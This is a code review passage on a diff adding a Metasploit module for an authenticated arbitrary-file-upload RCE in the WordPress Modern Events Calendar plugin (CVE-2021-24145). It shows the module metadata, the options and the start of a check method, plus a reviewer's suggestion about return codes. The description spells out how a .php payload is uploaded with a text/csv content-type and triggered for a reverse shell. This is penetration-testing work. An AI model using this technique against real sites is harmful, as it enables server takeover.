modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb

```diff
@@ -0,0 +1,115 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress Plugin Modern Events Calendar - Authenticated Remote Code Execution',
+        'Description' => %q{
+          This module allows an attacker with a privileged Wordpress account to launch a reverse shell
+          due to an arbitrary file upload vulnerability in Wordpress plugin Modern Events Calendar < 5.16.5.
+          This is due to an incorrect check of the uploaded file extension.
+          Indeed, by using `text/csv` content-type in a request, it is possible to upload a .php payload as is is not forbidden by the plugin.
+          Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/<random_payload_name>.php`
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Nguyen Van Khanh', # Original PoC and discovery
+            'RON JOST', # Exploit-db
+            'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+          ],
+        'References' =>
+          [
+            ['EDB', '50115'],
+            ['CVE', '2021-24145'],
+            ['CWE', '434']
+          ],
+        'Platform' => [ 'php' ],
+        'Arch' => ARCH_PHP,
+        'Targets' =>
+        [
+          [ 'Wordpress Modern Events Calendar < 5.16.5', {}]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2021-01-29',
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ]
+          }
+      )
+    )
+
+    register_options [
+      OptString.new('USERNAME', [true, 'Username of the admin account', 'admin']),
+      OptString.new('PASSWORD', [true, 'Password of the admin account', 'admin']),
+      OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/'])
+    ]
+  end
+
+  def check
+    unless wordpress_and_online?
+      fail_with(Failure::Unreachable, 'Server not online or not detected as wordpress')
```

Comment:
Return a `CheckCode` instead of using `fail_with()`. `CheckCode::Safe` would probably be best here.

```suggestion
     return CheckCode::Safe('Server not online or not detected as Wordpress')
```